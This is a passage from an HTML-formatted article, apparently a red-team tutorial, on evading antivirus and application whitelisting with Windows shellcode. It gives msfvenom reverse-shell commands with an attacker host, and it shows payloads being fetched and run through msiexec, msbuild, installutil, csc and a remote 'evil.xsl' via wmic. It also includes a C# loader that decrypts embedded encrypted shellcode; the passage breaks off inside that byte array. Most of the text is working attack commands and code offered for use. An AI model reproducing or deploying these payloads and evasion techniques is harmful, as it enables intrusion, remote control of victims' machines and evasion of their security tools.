&lt;p&gt;Template (replace shellcode at designated location):&lt;br&gt;
&lt;a href="https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta&lt;/a&gt;&lt;/p&gt;


  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8nltcajane075bucshj.png" alt="Figure 11: CACTUSTORCH.hta shellcode replacement location" width="798" height="163"&gt;Figure 11: CACTUSTORCH.hta shellcode replacement location
  

&lt;h4&gt;
  
  
  Msiexec:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 - f msi &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; qing.txt

C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\m&lt;/span&gt;siexec.exe /q /i http://192.168.174.134 /qing.txt

&lt;span class="c"&gt;# Loading DLL:&lt;/span&gt;
msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.134 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 - f dll &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; qing.dll

msiexec /y C:&lt;span class="se"&gt;\q&lt;/span&gt;ing.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Msbuild:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\m&lt;/span&gt;sbuild.exe qing.xml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Template (courtesy of 3gstudent):&lt;br&gt;
&lt;a href="https://github.com/3gstudent/msbuild-inline-task" rel="noopener noreferrer"&gt;https://github.com/3gstudent/msbuild-inline-task&lt;/a&gt;&lt;/p&gt;


  &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9sr4sjmpyzzydskuth27.png" alt="Figure 12: MSBuild inline task template" width="800" height="441"&gt;Figure 12: MSBuild inline task template
  

&lt;h4&gt;
  
  
  Installutil:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Compile:&lt;/span&gt;
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\c&lt;/span&gt;sc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:&lt;span class="se"&gt;\U&lt;/span&gt;sers&lt;span class="se"&gt;\J&lt;/span&gt;ohn&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\i&lt;/span&gt;nstallutil.snk /unsafe C:&lt;span class="se"&gt;\U&lt;/span&gt;sers&lt;span class="se"&gt;\J&lt;/span&gt;ohn&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\i&lt;/span&gt;nstallutil.cs

&lt;span class="c"&gt;# Execute:&lt;/span&gt;
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil.exe /logfile&lt;span class="o"&gt;=&lt;/span&gt; /LogToConsole&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt; /U qing.exe

&lt;span class="c"&gt;# Details:&lt;/span&gt;
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  Wmic:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;wmic os get /FORMAT:&lt;span class="s2"&gt;"http://example.com/evil.xsl"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Template:&lt;br&gt;
&lt;a href="https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Csc:
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-p&lt;/span&gt; windows/x64/shell/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.132 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;53 - f csharp

C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&lt;span class="se"&gt;\c&lt;/span&gt;sc.exe /unsafe /platform:x86 /out:D:&lt;span class="se"&gt;\t&lt;/span&gt;est&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil-shell.exe D:&lt;span class="se"&gt;\t&lt;/span&gt;est&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil-ShellCode.cs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Subsequent execution can be performed via Installutil.&lt;/p&gt;



&lt;p&gt;I shall refrain from enumerating further whitelist exploitation techniques, as the underlying principle remains consistent across different binaries.&lt;/p&gt;

&lt;p&gt;A pertinent question arises: in certain scenarios, the executables or DLLs generated from our shellcode may still be &lt;strong&gt;written to disk&lt;/strong&gt; when employing these techniques.&lt;/p&gt;

&lt;p&gt;Although the aforementioned in-memory loading methods can mitigate this issue, what if &lt;strong&gt;file system persistence is a mandatory requirement&lt;/strong&gt;? How can one evade detection in such cases?&lt;/p&gt;

&lt;p&gt;This brings us to the second major category of evasion techniques: &lt;strong&gt;Obfuscation&lt;/strong&gt;.&lt;/p&gt;


&lt;h2&gt;
  
  
  0x02 Shellcode "Obfuscation" Evasion
&lt;/h2&gt;

&lt;p&gt;Is it possible to apply the same &lt;strong&gt;obfuscation, encryption, and fragmentation&lt;/strong&gt; techniques used for PHP web shells to shellcode?&lt;/p&gt;

&lt;p&gt;Let us begin with the simplest examples.&lt;/p&gt;
&lt;h3&gt;
  
  
  A) Shellcode Encoding Obfuscation
&lt;/h3&gt;

&lt;p&gt;After XOR-encrypting the shellcode, memory is allocated for execution—a process fundamentally similar to the shellcode execution method described at the beginning of this article.&lt;/p&gt;
&lt;h4&gt;
  
  
  C# XOR Example (ShellcodeWrapper):
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.IO&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Collections.Generic&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Text&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Threading.Tasks&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Security.Cryptography&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;RunShellCode&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="c1"&gt;// CRYPTO FUNCTIONS&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;T&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="n"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nf"&gt;xor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;decrypted&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

            &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;++)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;decrypted&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;^&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;decrypted&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;//--------------------------------------------------------------------------------------------------&lt;/span&gt;
        &lt;span class="c1"&gt;// Decrypts the given a plaintext message byte array with a given 128 bits key&lt;/span&gt;
        &lt;span class="c1"&gt;// Returns the unencrypted message&lt;/span&gt;
        &lt;span class="c1"&gt;//--------------------------------------------------------------------------------------------------&lt;/span&gt;
        &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="nf"&gt;aesDecrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;encryptedMessage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;SubArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cipher&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="m"&gt;16&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

            &lt;span class="c1"&gt;// Create an AesManaged object with the specified key and IV.&lt;/span&gt;
            &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AesManaged&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;AesManaged&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Padding&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;PaddingMode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PKCS7&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;KeySize&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;128&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IV&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IV&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

                &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MemoryStream&lt;/span&gt; &lt;span class="n"&gt;ms&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;MemoryStream&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
                &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CryptoStream&lt;/span&gt; &lt;span class="n"&gt;cs&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nf"&gt;CryptoStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ms&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;CreateDecryptor&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="n"&gt;CryptoStreamMode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                    &lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="n"&gt;cs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encryptedMessage&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encryptedMessage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt;

                    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ms&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ToArray&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="c1"&gt;// MAIN FUNCTION&lt;/span&gt;
        &lt;span class="c1"&gt;//==============================================================================&lt;/span&gt;
        &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;encryptedShellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="m"&gt;0x8d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x81&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xee&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x94&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xae&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x03&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x23&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x35&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xde&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x15&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x70&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xae&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x23&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x35&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x24&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x25&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x92&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x21&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x37&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span 